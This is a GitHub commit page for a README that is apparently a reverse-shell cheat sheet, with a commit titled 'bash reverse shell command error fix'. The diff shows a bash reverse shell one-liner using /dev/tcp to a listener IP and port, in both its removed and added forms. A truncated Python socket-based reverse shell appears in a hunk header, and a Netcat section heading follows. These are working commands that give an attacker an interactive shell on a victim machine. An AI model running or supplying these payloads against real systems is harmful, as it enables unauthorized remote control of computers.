Skip to content

Commit 5eb104c

Browse files
author
İsmail Taşdelen
authored
bash reverse shell command error fix
bash reverse shell command error fix
1 parent 8d9b5b2 commit 5eb104c

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -25,7 +25,7 @@ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOC
2525
#### Bash :
2626

2727
```
28-
bash -i >& /dev/tcp/192.168.0.5/4444 0>&1
28+
bash -i >& /dev/tcp/192.168.0.1/8080 0>&1
2929
```
3030

3131
#### Netcat :

0 commit comments

Comments
 (0)